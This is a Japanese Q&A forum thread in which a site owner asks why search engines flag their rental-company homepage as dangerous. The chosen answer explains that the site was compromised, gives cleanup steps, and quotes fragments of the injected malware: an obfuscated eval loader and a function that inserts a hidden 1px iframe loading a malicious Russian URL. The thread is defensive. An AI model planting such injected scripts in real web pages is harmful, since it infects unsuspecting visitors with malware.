ここから本文です

「このサイトはコンピュータに損害を与える可能性があります」 の対策を教えて下さ...

tsu********さん

2013/7/2023:09:19

「このサイトはコンピュータに損害を与える可能性があります」 の対策を教えて下さい。

GoogleやYahooJapanで自分のホームページを検索すると、「このサイトはコンピュータに損害を与える可能性があります」と表示が出るようになってしまいました。解決方法がわからず困っています。対策を教えて下さい。ホームページのHTMLのフォルダごとウィルスス検索しましたが、異常なしとなります。また、パソコン本体も全体をウィルススキャンしたのですが、異常が出てきません。外部からホームページが狙われてるのでしょうか。ホームページは、http://福岡レンタル.com/ です。何卒宜しくお願い致します。

補足smart_nekotan_reloadiedさん 大変貴重なご意見、ありがとうございます。
現在、サーバーの管理会社に連絡中しつつ、サイトの担当者と対応を実行中です。
いろいろと見てもらったところ(まだ未確定ではありますが)サーバーに侵入されての感染ではなさそうです。
ひとまず、御礼申し上げます。

閲覧数:
2,738
回答数:
1
お礼:
50枚

違反報告

ベストアンサーに選ばれた回答

sma********さん

編集あり2013/7/2312:48:19

さらに追記

http://www.aguse.jp/?url=http://xn--5ckueb2a7987btr8d.com/

素晴らしい対応をされていると思います。御社の評価は上がります。
閲覧者には、ウイルス対策ソフトでscanすることをすすめてください。




追記

スレ主さんは、誠実な人柄だと感じております。なので、速やかなサイト閉鎖を。その方が社会的信頼感は高まりますから。1)とにかくサイト閉鎖を。googleが、大阪レンタルcomを「危険なサイト」と表示してアクセス禁止処分をした以上、これは簡単には解決できない=時間がかかるのです。だから、迷うことなくまず、サイト閉鎖してください。感染解決するほうが「先決」なんです。

2)無感染PCを。この間、そのwebに関与した「疑わしい」PCは使用不可です。まったく、関与してこなかった「無感染PCのみ」使い、まず、password変更しなければいけません。攻撃者がhome pageに侵入できないようにしなければいけないわけです。感染PCでpasswordの変更をしてしまうと、そのpasswordは攻撃者に漏れるので、再度、侵入され改竄されるわけですよ。

3)さて、サーバーですが、FTP通信「しか」できないサーバーなのであれば「契約を終わらせ」る必要があります。「FTPS通信を保障」しているサーバーに切り替えないと、「危険」な時代なのです。http://sourceforge.jp/projects/ffftp/
通信を暗号化してください。これに対応できるサーバーを選択しないと、ダメな時代です。

****
99%、PCが感染しています。ウイルス対策ソフトで検知できないといいますが、当然です。ウイルス対策ソフトは「万能」ではないからです。キーロガータイプだろう、という声が感染被害者からも挙がっており、従来の「わかりやすい」ウイルス型では、なくなっていると予想しています。スレ主さんは、この間、「脆弱性対策」してきましたか?おそらく「していない」でしょう。狙われたのは、スレ主さんらのPCだと思いますよ。

速やかなサイト閉鎖を。
改竄を阻止し、ソースコードを正しく修正し、それからgoogleに「再審査」を要請してください。この順番を踏めば、googleからの警告は消え、誰でもアクセスできるようになるんですからね。

健闘をお祈りします
(大阪レンタルcomのソースコードは、修正されたのですかね?攻撃codeは、消去され、malware反応はなくなりました。でも、この作業だけではgoogleの警告は消えません。こっちから再審査を申請しないと、解除してもらえない)

-----------------------------


(以下は、昨日の時点での感染実態。現在は、ソースコードが修正され、感染していない状態にある)


大阪レンタル.comのソースコードをscanした結果は



https://www.virustotal.com/ja/file/4d01623f5505d84815174ee013ad9f10...
で、ソースコードをみてみました。すると


大阪市、尼崎市、池田市、伊丹市</font></div><!--0c0896--><script type="text/javascript" language="javascript" > ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-026b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_78_6d_28_45_と延々と続く改竄code.完全に感染してますよ。




http://www.aguse.jp/?url=http://xn--5ckueb2a7987btr8d.com/

malwareが検知されているんじゃありませんかね?

大阪レンタル。comは関連ショップでしょ?


ーーーーーーー
大阪レンタル。comの調査すると



http://sitecheck.sucuri.net/results/xn--5ckueb2a7987btr8d.com/


http://jsunpack.jeek.org/?report=df858b1925510d2444e99840f2dad87faf...

ソースコード改竄されてますね。アウトです。

「0c0896」ではじまる、猛威をふるっているタイプのソースコード改竄+リダイレクト=転送先にてmalwareに感染させられる。

ーーーーーーーーーーーーー
感染ですな。

http://wepawet.iseclab.org/view.php?hash=ece2a56b1b9e3efbf534c7a67b...


function zzzfff(){
var pe = document.createElement('iframe');
pe.src = 'htp://inntech.org.ru/counter.php';
pe.style.position = 'absolute';
pe.style.border = '0';
pe.style.height = '1px';
pe.style.width = '1px';
pe.style.left = '1px';
pe.style.top = '1px';
if (!document.getElementById('pe')){
document.write('<div id=\'pe\'></div>');
document.getElementById('pe').appendChild(pe);
典型的事例




ーーーーーーーーーーー

サイトのソースコードのどこかに、

例えばですが

「htp://inntech.org.ru/counter.php

質問した人からのコメント

2013/7/26 15:44:57

降参 この度は、ご丁寧な解説ありがとうございました。一旦HPを閉鎖しての、PC購入や再セットアップなどかなり時間がかかりましたが、良い勉強になったと思います。これからは、このような事がないように十分注意致します。

あわせて知りたい

みんなで作る知恵袋 悩みや疑問、なんでも気軽にきいちゃおう!

Q&Aをキーワードで検索:

Yahoo! JAPANは、回答に記載された内容の信ぴょう性、正確性を保証しておりません。
お客様自身の責任と判断で、ご利用ください。
本文はここまでです このページの先頭へ

「追加する」ボタンを押してください。

閉じる

※知恵コレクションに追加された質問は選択されたID/ニックネームのMy知恵袋で確認できます。

不適切な投稿でないことを報告しました。

閉じる